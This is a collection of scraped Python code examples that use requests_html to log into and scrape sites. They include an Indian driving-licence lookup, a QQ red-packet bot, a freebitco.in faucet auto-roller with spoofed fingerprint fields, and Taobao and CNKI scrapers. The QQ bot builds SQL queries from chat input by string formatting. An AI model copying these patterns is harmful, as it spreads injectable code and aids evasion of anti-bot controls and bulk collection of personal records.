    elif details["method"] == "get":
        res = session.get(submit_url, params=data)
        # return res

    # ----------Authorization-----------

    auth_cookie = res.cookies

    # ---------Data Extract-------------

    name_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[2]/td[2]'
    issue_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[2]'
    expiry_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[3]'
    vehicle_class_xpath = '//*[@id="form_rcdl:j_idt164_data"]/tr/td[2]'
    driving_num_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[5]/td[2]'

    url = 'https://parivahan.gov.in/rcdlstatus/vahan/rcDlHome.xhtml'
    response = requests.get(url, cookies=auth_cookie)
    byte_data = response.content
    source_code = html.fromstring(byte_data)

    # --------------CSV DUMP----------------------
    final_data = [
        ["Name"],
        ["Issue Date"],
        ["Expiry Date"],
        ["Vehicle Class"],
        ["Driving Licence Number"],
    ]

    name_list = source_code.xpath(name_xpath)
    issue_list = source_code.xpath(issue_xpath)
    expiry_list = source_code.xpath(expiry_xpath)
    class_list = source_code.xpath(vehicle_class_xpath)
    driv_num = source_code.xpath(driving_num_xpath)

    # print(tree[0].text_content())

    for i in range(len(name_list)):
        final_data[0].append(name_list[i].text_content())
        final_data[1].append(issue_list[i].text_content())
        final_data[2].append(expiry_list[i].text_content())
        final_data[3].append(class_list[i].text_content())
        final_data[4].append(driv_num[i].text_content())

    output_df = pd.DataFrame(final_data)
    output_df.to_csv("output.csv", index=True)
Exemplo n.º 25
0
    def download_manga(self, start_link, end_link=""):
        """given a start link and end link from twistedhelscans.com, downloads all manga images"""
        next_link = start_link
        counter = 1

        # Deal with end link being first page
        if end_link.endswith('1'):
            end_link = end_link[:-6]

        # Initial page
        session = HTMLSession()
        page = session.post(start_link, data=dict(adult="true"))

        # get title of manga
        try:
            title = gen_title(page)
        except:
            self.queue.put(
                "Could not find title. Website is not Twisted Hel Scan page?")
            return

        while next_link != end_link:
            # Open next page
            page = session.post(next_link, data=dict(adult="true"))

            # check if end link is first page redirect
            if page.url == end_link:
                break

            self.queue.put(page.url)

            if not end_link:
                end_link = page.html.find('h1.hb.dnone', first=True).find(
                    'a', first=True).attrs['href']

            # Find image link and vol. num
            try:
                volume = get_volume(page)
                image = page.html.find('div.inner', first=True).find(
                    'img', first=True).attrs['src']
            except:
                self.queue.put(
                    "Could not find image link. Website is not Twisted Hel Scan page?"
                )
                return

            # Download the image
            image = session.get(image)

            # Make manga directory
            if not os.path.exists(title):
                try:
                    os.mkdir(title)
                except IOError:
                    self.queue.put("Could not make directory")
                    return

            # Make volume directory
            if not os.path.exists(title + "/" + volume):
                try:
                    os.mkdir(title + "/" + volume)
                except IOError:
                    self.queue.put("Could not make directory")
                    return

                counter = 1

            # Write image to file
            self.write_image(image, title, volume, counter)
            counter += 1

            # Find next link
            next_link = page.html.find('div.inner', first=True).find(
                'a', first=True).attrs['href']
        self.queue.put("Done")
Exemplo n.º 26
0
def onQQMessage(bot, contact, member, content):

    if not bot.isMe(contact, member):

        if content == '.help' or '[@ME]' in content:
            bot.SendTo(
                contact, '转发【链接】添加红包\n' + '输入【.1】获取红包并垫一手\n' +
                '输入【.11】获取红包但不垫\n' + '输入【.2】查询剩余个数\n' +
                '输入【.u1 链接】将链接标记为已使用\n' + '输入【.u0 链接】将链接标记为未使用\n')

        elif content == '.stop':
            bot.SendTo(contact, '红包机器人好像关闭不了')
            # bot.Stop()

        else:
            con = sqlite3.connect(DB_NAME)  # the directory is qqbot's startup directory
            cur = con.cursor()
            table = 'hb'
            # SQLite does not have a separate Boolean storage class.
            # Instead, Boolean values are stored as integers 0 (false) and 1 (true).
            cur.execute(
                'CREATE TABLE IF NOT EXISTS %s (url TEXT PRIMARY KEY, used INTEGER DEFAULT 0)'
                % table)

            # if content == '.clrdb':
            #     try:
            #         cur.execute('DELETE FROM %s' % table)
            #         bot.SendTo(contact, '清库成功!')
            #     except Exception as e:
            #         bot.SendTo(contact, '清库失败!异常:' + str(e))

            if content.startswith('https://url.cn/') and len(content) == 22:
                bot.SendTo(contact, content)
                bot.SendTo(contact, '收到红包链接,处理中...')

                try:
                    cur.execute('insert into %s values("%s", 0)' %
                                (table, content))
                    bot.SendTo(contact, '添加成功!')
                    con.commit()

                except Exception as e:
                    if 'Duplicate' in str(e) or 'UNIQUE' in str(e):
                        bot.SendTo(contact, '添加失败!这个红包已经有了!')
                    else:
                        bot.SendTo(contact, '添加失败!异常:' + str(e))
                    con.rollback()

            elif content == '.1':
                bot.SendTo(contact, '查询中...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()

                if data is None:
                    bot.SendTo(contact, '红包已经耗尽了!')
                else:
                    url = data[0]

                    url_login = '******'
                    headers = \
                        {'Host': 'api.mtdhb.org',
                         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
                         'Accept': 'application/json, text/plain, */*',
                         'Accept-Language': 'en-US,en-US;q=0.7,en;q=0.3',
                         'Accept-Encoding': 'gzip, deflate, br',
                         'Content-Type': 'application/x-www-form-urlencoded',
                         'DNT': '1',
                         'Connection': 'keep-alive'}
                    browser = HTMLSession()
                    browser.get(url_login, headers=headers)

                    data_login = {'account': ACCOUNT, 'password': PASSWORD}
                    url_login_api = 'https://api.mtdhb.org/user/login'
                    r = browser.post(url_login_api, data=data_login)
                    if r.json()['code'] == 0:
                        bot.SendTo(contact, '登录成功...')

                        url_receive_api = 'https://api.mtdhb.org/user/receiving'
                        data_receive = {'phone': '', 'url': url, 'force': 0}

                        headers['X-User-Token'] = r.json()['data']['token']

                        r = browser.post(url_receive_api,
                                         data=data_receive,
                                         headers=headers)
                        if r.json()['code'] == 0:
                            sec = 3
                            bot.SendTo(contact, '正在垫一手...等待%d秒' % sec)
                            url_number_api = 'https://api.mtdhb.org/user/number'
                            time.sleep(sec)

                            r = browser.get(url_number_api, headers=headers)
                            if r.json()['code'] == 0:
                                bot.SendTo(
                                    contact, '剩余次数:%d' %
                                    r.json()['data']['ele']['available'])
                                bot.SendTo(
                                    contact, '总共次数:%d' %
                                    r.json()['data']['ele']['total'])
                            else:
                                bot.SendTo(contact,
                                           '获取次数失败!JSON = %s' % r.json())

                            bot.SendTo(contact, '最佳手气红包链接如下,可以直接领取:')
                            bot.SendTo(contact, url)

                            try:
                                cur.execute(
                                    'UPDATE %s SET used=1 WHERE url = "%s"' %
                                    (table, url))
                                con.commit()

                                cur.execute(
                                    'SELECT count(*) FROM %s WHERE used=0' %
                                    table)
                                bot.SendTo(contact,
                                           '未使用红包:%d个' % cur.fetchone()[0])

                            except Exception as e:
                                bot.SendTo(contact, '更新标记失败!\n' + str(e))
                                con.rollback()

                        else:
                            bot.SendTo(contact, '垫一手失败!JSON = %s' % r.json())
                    else:
                        bot.SendTo(contact, '登录失败!JSON = %s' % r.json())

            elif content == '.11':
                bot.SendTo(contact, '查询中...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()

                if data is None:
                    bot.SendTo(contact, '红包已经耗尽了!')
                else:
                    url = data[0]
                    bot.SendTo(contact, '红包链接如下:')
                    bot.SendTo(contact, url)

                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url = "%s"' %
                                    (table, url))
                        con.commit()

                        cur.execute('SELECT count(*) FROM %s WHERE used=0' %
                                    table)
                        bot.SendTo(contact, '未使用红包:%d个' % cur.fetchone()[0])

                    except Exception as e:
                        bot.SendTo(contact, '更新标记失败!\n' + str(e))
                        con.rollback()

            elif content == '.2':
                try:
                    cur.execute('SELECT count(*) FROM %s WHERE used=0' % table)
                    bot.SendTo(contact, '未使用红包:%d个' % cur.fetchone()[0])
                    # cur.fetchone() => Row
                    # cur.fetchone()[0] => Row[Col=0]

                    cur.execute('SELECT count(*) FROM %s' % table)
                    bot.SendTo(contact, '总红包数量:%d个' % cur.fetchone()[0])

                except Exception as e:
                    bot.SendTo(contact, '查询失败!异常:' + str(e))

            elif content.startswith('.u1 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url="%s"' %
                                    (table, url))
                        con.commit()
                        bot.SendTo(contact, '标记成功')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, '标记异常:' + str(e))
                else:
                    bot.SendTo(contact, '链接不正确!')

            elif content.startswith('.u0 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=0 WHERE url="%s"' %
                                    (table, url))
                        con.commit()
                        bot.SendTo(contact, '标记成功')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, '标记异常:' + str(e))
                else:
                    bot.SendTo(contact, '链接不正确!')

            elif content.startswith('.'):
                bot.SendTo(contact, '未知指令,输入【.help】获取帮助')

            cur.close()
            con.close()
Exemplo n.º 27
0
class Client:
    _URL = 'https://freebitco.in'

    def __init__(self, verify_ssl=True):
        self._logger = logging.getLogger('root.fbclient_direct')
        self._session = HTMLSession()
        self._session.verify = verify_ssl
        self._cache = defaultdict(lambda: (None, datetime.now(), 5))

    def _check_login(func):
        def wrapper(*args, **kwargs):
            self = args[0]
            self._logger.debug('Verifying login')
            html = self._get_main_page()

            if html.find('#balance', first=True):
                return func(*args, **kwargs)

            self._logger.error('You are not logged in')
            raise LoginError('Not logged in')

        return wrapper

    def login(self, username, password, otc=None):
        self._logger.info(f'Logging in, user: {username}')

        if not username:
            self._logger.error('Username required')
            raise ValueError('Username required')
        elif not password:
            self._logger.error('Password required')
            raise ValueError('Password required')

        login_page = self._session.get(f'{self._URL}/?op=signup_page')

        csrf = login_page.cookies['csrf_token']
        self._session.headers['x-csrf-token'] = csrf

        data = (f'csrf_token={quote(csrf)}'
                f'&op=login_new'
                f'&btc_address={quote(username)}'
                f'&password={quote(password)}')

        if otc:
            data += f'&tfa_code={otc}'

        response = self._session.post(self._URL, data)
        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info('Login success')
            self._session.cookies['btc_address'] = result[1]
            self._session.cookies['password'] = result[2]
            self._session.cookies['have_account'] = '1'
        elif result[0] == 'e':
            raise LoginError(f'Login failed: {result[1]}')
        else:
            raise LoginError(f'Login failed: {response}')

    @_check_login
    def activate_rp_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Points, amount)

    @_check_login
    def activate_lottery_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Lottery, amount)

    @_check_login
    def activate_btc_bonus(self, amount=1000):
        return self._activate_bonus(_RewardType.FreeBTC, amount)

    @_check_login
    def roll(self, play_without_captcha=False):
        self._logger.info('Rolling')
        login_page = self._session.get(f'{self._URL}')

        data = (f'csrf_token={self._session.headers["x-csrf-token"]}'
                f"&op=free_play"
                f"&fingerprint=43b0ec50d04dfcf473f26b8fa7c8f72f"
                f"&client_seed={self._get_roll_seed()}"
                f"&fingerprint2=2592886125"
                f"&pwc={int(play_without_captcha)}"
                f"&89591411d5cf=1567309413%3A26e9b826a33e321aa27c09d235c158ff18de7f48ce850838ffe7f669cc30b436"
                f"&d4202f82cc23=1b208b3be22da3a07e58deb40fbecc0ef43b43b3216b8c2cc9ba7bc28646c21e")

        response = self._session.post(self._URL, data)
        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info(f'Roll success, number: {result[1]}, win: {result[3]} BTC, balance: {result[2]} BTC')
            return True
        elif result[0] == 'e':
            self._logger.error(f'Roll failed: {result[1]}')
        else:
            self._logger.error(f'Roll failed: {response.text}')

        return False

    @_check_login
    def get_roll_timer(self):
        self._logger.info('Retrieving roll timer')
        html = self._get_main_page()
        time_remaining_pattern = re.compile(r"\$\('#time_remaining'\).countdown\({until: \+(\d+)")
        match = time_remaining_pattern.search(html.html)

        if not match:
            self._logger.info('Timer not running')
            return 0

        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    @_check_login
    def get_balance(self):
        self._logger.info('Retrieving points balance')
        html = self._get_main_page()
        balance = html.find('#balance', first=True).text
        self._logger.info(f'Balance: {balance}')
        return float(balance.replace(',', ''))

    @_check_login
    def get_rp_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Points)

    @_check_login
    def get_lottery_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Lottery)

    @_check_login
    def get_btc_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.FreeBTC)

    @_check_login
    def get_rewards_balance(self):
        self._logger.info('Retrieving rewards balance')
        html = self._get_main_page()
        points = html.find('div.user_reward_points', first=True).text
        self._logger.info(f'Rewards points: {points}')
        return int(points.replace(',', ''))

    def _get_rewards_timer(self, reward_type):
        self._logger.info(f'Retrieving rewards timer: {reward_type.bonus_id}')
        html = self._get_main_page()
        bonus_pattern = re.compile(rf'BonusEndCountdown\("{reward_type.bonus_id}",(\d+)\)')
        match = bonus_pattern.search(html.html)

        if not match:
            self._logger.info(f'Bonus timer: {reward_type.bonus_id} not running')
            return 0

        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    def _get_main_page(self):
        html, expiry, cache_time = self._cache['html']

        if datetime.now() >= expiry:
            self._logger.debug('Downloading main page')
            html = self._session.get(f'{self._URL}/?op=home').html
            expiry = datetime.now() + timedelta(seconds=cache_time)
            self._cache['html'] = (html, expiry, cache_time)

        return html

    def _activate_bonus(self, reward_type, amount):
        self._logger.info('Activating: %s %d bonus' % (reward_type.name, amount))

        response = self._session.get(f'{self._URL}/'
                                     f'?op=redeem_rewards'
                                     f'&id={reward_type.bonus_id}_{amount}'
                                     f'&points='
                                     f'&csrf_token={self._session.headers["x-csrf-token"]}')

        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info('Bonus activation successful')
            return True
        elif result[0] == 'e':
            self._logger.error(f'Bonus activation failed: {result[1]}')
        else:
            self._logger.error(f'Bonus activation failed: {response.text}')

        return False

    def _get_roll_seed(self, length=16):
        self._logger.info('Generating roll seed')
        chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
        seed = str.join('', (random.choice(chars) for i in range(length)))
        self._logger.debug('Seed: %s' % seed)
        return seed
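A hypothetical driver for the client above; the credentials are placeholders, and the roll is only attempted once the cooldown timer has expired.

client = Client()
client.login('user@example.com', 'secret')
if client.get_roll_timer() == 0:
    client.roll()
print('balance:', client.get_balance(), 'BTC,',
      client.get_rewards_balance(), 'reward points')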
Exemplo n.º 28
0
# print(data)
# print(data["items"])
data_list = data["items"]
data_list_items = data_list[0]
# print(data_list_items)
data_nm = data_list_items["nm"]
# print(data_nm)
if data_nm == 'profpererobka':
    reportResourceId = data_list_items["id"]
    print(f'reportResourceId: {reportResourceId}')

params = 'core/search_items&sid=' + sid + '&params='
cur_object = 'AA9186XE'
body = '{"spec":{"itemsType":"avl_unit","propName":"sys_name","propValueMask":"' + cur_object + \
       '","sortType":"sys_name"},"force":1,"flags":1,"from":0,"to":0}'
url_params = url_resurs + params + body

print(f'{url_host}{url_resurs}{params}')

#res = session.get(url_host + url_params)
res = session.post(url_host + url_resurs + params,
                   body)  # body is sent as the raw request payload ("Content-Type: application/json")

if res.status_code != 200:
    exit(res.status_code)

data = res.json()
print(data)
# reportObjectId = data['items'][0]['id']
# print(f'reportObjectId: {reportObjectId}')
Exemplo n.º 29
0
class Engine:
    def __init__(self, **kwargs):
        self.q = None
        self.s = None
        self.cps = None
        self.cat = None
        self.ppath = None
        self.loc = None
        self.mode = None
        self.kwargs = None
        self.json = None
        self.url = None  # site URL (required)
        self.cookie = None  # login cookie (required)
        self.filter = None
        self.session = HTMLSession()
        self.article = "https://s.taobao.com/search?"  # item search URL
        self.store = "https://shopsearch.taobao.com/search?"  # shop search URL
        self.header = {
            "cookie": None,
        }

    def get_cookie(self, user, password):
        """获取cookie"""
        url = 'https://login.taobao.com/newlogin/login.do?appName=taobao&fromSite=0'
        parameter = {
            'loginId': user,
            'password2': password,
        }
        html = self.session.post(url, data=parameter)
        print(html.cookies)
        self.header['cookie'] = html.cookies

    def __get_parameter(self, s):
        """获取参数"""
        self.kwargs = {
            'q': self.q,
        }
        if self.mode == '宝贝':
            self.url = self.article
        else:
            self.url = self.store
        if self.cps == 'yes':
            self.kwargs['cps'] = 'yes'
            if self.cat:
                self.kwargs['cat'] = self.cat
            else:
                self.kwargs['ppath'] = self.ppath
            if self.loc:
                self.kwargs['loc'] = self.loc
        if s == 0:
            pass
        else:
            self.kwargs['s'] = s * 44
        return self.kwargs

    def __get_html(self, s):
        """获取网页内容并解码 """
        self.__get_parameter(s)
        html = self.session.get(self.url,
                                headers=self.header,
                                params=self.kwargs)
        print(html.url)
        html = html.text
        start = html.find('g_page_config = ') + len('g_page_config = ')
        end = html.find('"shopcardOff":true}') + len('"shopcardOff":true}')
        # with open('index.html', 'w', encoding='utf-8') as f:
        # 	f.write(html)
        js = json.loads(html[start:end + 1])
        self.json.append(js)
        sleep(1)

    def load_data(self):
        """ 获取搜索数据 搜索结果写到json文件里面 """
        self.json = []
        for s in range(int(self.s)):
            self.__get_html(s)
        self.set_auctions()

    # self.set_filter()

    def set_ppath(self, ppath):
        """设置ppath值 : ;"""
        self.cps = 'yes'
        self.ppath = ppath.replace(":", "%3A").replace(";", "%3B")

    def set_loc(self, loc):
        """设置loc值 ,"""
        self.cps = 'yes'
        self.ppath = self.ppath if self.ppath else ''
        self.loc = loc.replace(",", "%2C")

    def set_auctions(self):
        """ 设置网站所有商品信息 list """
        return dataprocess.set_auctions(
            [d['mods']["itemlist"]["data"]["auctions"] for d in self.json])

    def set_filter(self):
        """ 设置所有宝贝分类 dict {common(所有分类别) adv(筛选条件)}"""
        return dataprocess.set_filter(
            [self.json[0]['mods']["nav"]['data']['common']])

    @staticmethod
    def get_filter():
        """get filter"""
        # return dataprocess.getFilter()
        ...

    def get_pager(self):
        """ 获取 s 页码"""
        return [d['mods']['pager']['data'] for d in self.json]

    def get_price(self):
        """获取受喜率 价格区间 list """
        return self.json[0]['mods']['sortbar']['data']['price']['rank']

    def get_related(self):
        """ 获取相关搜索 list """
        return self.json[0]["related"]["data"]["words"]

    def get_tab(self):
        """ 获取tab参数 list"""
        return self.json[0]["tab"]["data"]["tabs"]

    def get_header(self):
        """ 获取url参数 dict
            q			关键字
            tabParams	后缀
                js
                stats_click
                initiative_id
                ie
            dropdown	切换前缀  list
                url
                text
        """
        return self.json[0]["header"]["data"]

    def detection(self):
        ...
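A hypothetical way to drive the Engine above; the attribute names follow __get_parameter, and dataprocess (which set_auctions delegates to) must exist in the project.

engine = Engine()
engine.q = 'iphone'    # search keyword
engine.s = 2           # number of result pages to fetch (44 items per page)
engine.mode = '宝贝'    # item search; any other value searches shops instead
engine.load_data()
print(engine.get_related())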
Exemplo n.º 30
0
        # i = 0
        # while i < len(txt2):
        #     if txt2[i: i + 4] == "frac":
        #         in_frac == True
        #
        #     if txt2[i] == "(":
        #         cnt += 1
        #     if txt2[i] == ")":
        #         cnt -= 1
        #         if cnt == 0:
        #             seg += 1
        #         if seg == 2:
        #             txt1 = txt2[:i + 1]
        #             txt2 = txt2[i + 1:]
        #             break

        # print(txt2)

        try:
            # print("xd")
            # xd = input()
            res, err = integrate.quad(f_(txt2), mn, mx)
            print(mn, mx, res)
            res = session.post("http://202.38.93.111:10190/submit",
                               data={"ans": "%f" % res})
            print("success!!", total)
            print(res.content)
        except Exception as e:
            res = session.post("http://202.38.93.111:10190/submit",
                               data={"ans": "2.33333333"})
Exemplo n.º 31
0
class TimesheetAPI:
    LOGIN_URL = "https://www.timesheets.com.au/tplogin/default.asp"
    VIEW_TIMESHEET_URL = "https://www.timesheets.com.au/tp60/ViewTimeSheet.asp"
    INPUT_TIME_URL = "https://www.timesheets.com.au/tp60/InputTime.asp"
    ERROR_TABLE_XPATH = '//a[@name="ErrorTable"]/following-sibling::table'

    LoginError = LoginError
    WebsiteError = WebsiteError

    def __init__(self):
        self.session = HTMLSession()
        self.user_context_id = None
        self.staff_id = None
        self.logged_in = False

    def _parse_html_login_errors(self, error_table):
        error_tds = error_table.xpath(
            '//img[@src="images/invalid.png"]/ancestor::tr[1]/td[2]'
        )
        return [e.text for e in error_tds]

    def _parse_html_options(self, html, option_name, selected=False):
        if selected:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[@selected]'
            ) or html.xpath(f'//input[@name="{option_name}"]')
        else:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[not(@value="")]'
            )
        options = [(o.attrs.get("value"), o.text) for o in options]
        if selected:
            return options[0] if options else None
        return options

    def _parse_html_customer_options(self, html):
        options = self._parse_html_options(html, option_name="CustomerCode_0_0")
        customers = []
        for code, description in options:
            customers.append(
                {"customer_code": code, "customer_description": description}
            )
        return customers

    def _parse_html_project_options(self, html):
        pattern = (
            r"AddProjectEntry\("
            "'(?P<customer_code>[^']*?)',"
            "'(?P<project_code>[^']*?)',"
            "'(?P<project_psid>[^']*?)',"
            "'(?P<project_description>[^']*?)',"
            "(?P<task_count>[^']*?)"
            "\)\s"
        )
        projects = re.finditer(pattern, html.html)
        return [p.groupdict() for p in projects]

    def _parse_html_task_options(self, html):
        pattern = (
            r"AddTaskEntry\("
            "'(?P<project_code>[^']*?)',"
            "'(?P<task_id>[^']*?)',"
            "'(?P<task_description>[^']*?)'"
            "\)"
        )
        tasks = re.finditer(pattern, html.html)
        return [t.groupdict() for t in tasks]

    def login(self, username, password, customer_id):
        data = {
            "CurrentClientTime": "",
            "compact": "off",
            "ForceInterface": "S",
            "systemid": customer_id,
            "username": username,
            "password": password,
        }
        r = self.session.post(self.LOGIN_URL, data=data)

        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise LoginError(" ".join(errors))

        # Detect rejected logon
        rejected_login_input = r.html.find('input[name="RejectedLogon"]')
        if rejected_login_input:
            raise LoginError("Invalid login credentials.")

        # Find UserContextID (required for future session requests)
        user_context_input = r.html.find('input[name="UserContextID"]', first=True)
        if user_context_input:
            self.user_context_id = user_context_input.attrs.get("value")
        else:
            raise LoginError("UserContextID not found in login response.")

        # Load ViewTimesheet page to get StaffID
        r = self.session.post(
            self.VIEW_TIMESHEET_URL, data={"UserContextID": self.user_context_id}
        )
        staff_id_input = r.html.find('input[name="StaffID"]', first=True)
        if staff_id_input:
            self.staff_id = staff_id_input.attrs.get("value")
        else:
            raise LoginError("StaffID not found in login response.")
        self.logged_in = True

    def get_timecodes(self):
        if not self.logged_in:
            raise LoginError("Not logged in.")
        next_month_end = TODAY + relativedelta(months=+1, day=31)
        filter_day = next_month_end.strftime("%d-%b-%Y")
        data = {
            "UserContextID": self.user_context_id,
            "StaffID": self.staff_id,
            "Mode": "Day",
            "StartDate": filter_day,
            "EndDate": filter_day,
        }
        r = self.session.post(self.INPUT_TIME_URL, data=data)
        customers = self._parse_html_customer_options(r.html)
        projects = self._parse_html_project_options(r.html)
        tasks = self._parse_html_task_options(r.html)
        return customers, projects, tasks

    def get_timesheet(self, start_date=None, end_date=None):
        if start_date is None and end_date is None:
            # default to get this week's timesheet (excl. previous month)
            start_date = max(
                [TODAY + relativedelta(day=1), TODAY + relativedelta(weekday=MO(-1))]
            )
            end_date = TODAY + relativedelta(weekday=FR)
        r = self.session.post(
            self.INPUT_TIME_URL,
            data={
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "Mode": "Week",
                "StartDate": start_date.strftime("%d-%b-%Y"),
                "EndDate": end_date.strftime("%d-%b-%Y"),
            },
        )
        customer_options, project_options, task_options = self.get_timecodes()
        return Timesheet(
            html=r.html,
            customer_options=customer_options,
            project_options=project_options,
            task_options=task_options,
        )

    def post_timesheet(self, timesheet):
        form_data = timesheet.form_data()
        row_count = timesheet.count_entries()
        form_data.update(
            {
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "InputRows": row_count,
                "Save": "%A0%A0Save%A0%A0",
                "DataForm": "TimeEntry {}".format(self.staff_id),  # Important!
                # 'OptionsDisplayed': 'N',
                # 'OverrideAction': '',
                # 'DeletesPending': ''
            }
        )
        r = self.session.post(
            self.INPUT_TIME_URL,
            data=form_data,
            headers={"Referer": self.INPUT_TIME_URL},
        )

        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise WebsiteError(" ".join(errors))

        return r
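A hypothetical login and read-back against the wrapper above; the username, password and customer id are placeholders, and Timesheet/TODAY/relativedelta come from the surrounding module as the class already assumes.

api = TimesheetAPI()
api.login('jsmith', 'secret', customer_id='12345')
customers, projects, tasks = api.get_timecodes()
print(len(customers), 'customers,', len(projects), 'projects,', len(tasks), 'tasks')
timesheet = api.get_timesheet()   # defaults to the current week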
Exemplo n.º 32
0
class GetPage():
    def __init__(self):
        self.session = HTMLSession()
        self.cur_page_num = 1  # current page number
        # fetch a cookie to keep the session alive
        self.session.get(BASIC_URL, headers=HEADER)

    # Pass in the search keyword and the search condition; both must be str.
    def getSearchResult(self, kword, condition):
        # The databases searched can be controlled here; no restriction is applied.
        static_post_data = {
            'action': '',
            'NaviCode': '*',
            'ua': '1.21',
            'isinEn': '1',
            'PageName': 'ASP.brief_default_result_aspx',
            'DbPrefix': 'SCDB',
            'DbCatalog': '中国学术期刊网络出版总库',
            'ConfigFile': 'SCDB.xml',
            'db_opt': 'CJFQ,CDFD,CMFD,CPFD,IPFD,CCND,CCJD',  # search categories (the checkboxes on CNKI's right-hand side)
            'his': '0',
            '__': time.asctime(time.localtime()) + ' GMT+0800 (中国标准时间)'
        }
        # The search conditions can be changed here
        search_condition = {
            '主题': 'SU$%=|',
            '关键词': 'KY$=|',
            '篇名': 'TI$%=|',
            '摘要': 'AB$%=|',
            '全文': 'FT$%=|'
        }
        u_input = {
            'txt_1_sel': '',
            'txt_1_value1': '',
            'txt_1_relation': '#CNKI_AND',
            'txt_1_special1': '='
        }
        u_input['txt_1_sel'] = search_condition.get(condition)
        u_input['txt_1_value1'] = kword
        post_data = dict(static_post_data, **u_input)
        # send the POST request
        req_first = self.session.post(POST_URL, data=post_data, headers=HEADER)
        # URL-encode the search keyword
        k_v = quote(u_input.get('txt_1_value1'))
        # build the URL and send a GET request to obtain the search results page
        result_url = GET_PAGE_URL + req_first.text + '&t=1544249384932&keyValue=' + k_v + '&S=1&sorttype='
        req_sec = self.session.get(result_url, headers=HEADER)
        # parse the results page to get the title, detail-page URL, author, source, publish date, database, citation count and download count
        rows = req_sec.html.xpath('//tr[@bgcolor]')
        for row in rows:
            td = row.find('td')
            title = td[1].find('a', first=True).text
            detail_url = re.sub('/kns', 'http://kns.cnki.net/KCMS',
                                td[1].find('a', first=True).attrs['href'])
            author = td[2].text
            journal = td[3].text
            publish_date = td[4].text
            database = td[5].text
            cite_count = row.find('span[class="KnowledgeNetcont"]', first=True)
            if cite_count:
                cite_count = cite_count.text
            else:
                cite_count = 0
            print(title)
            print(detail_url)
            print(author)
            print(journal)
            print(publish_date)
            print(database)
            print(cite_count)
            i = GetDetail().parsePage(detail_url)
            if i:
                for a in i:
                    print(a)
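A hypothetical search with the class above; BASIC_URL, HEADER, POST_URL, GET_PAGE_URL and GetDetail are module-level names the class already assumes, and the query keyword is a placeholder.

if __name__ == '__main__':
    page = GetPage()
    page.getSearchResult('machine learning', '主题')  # '主题' = subject search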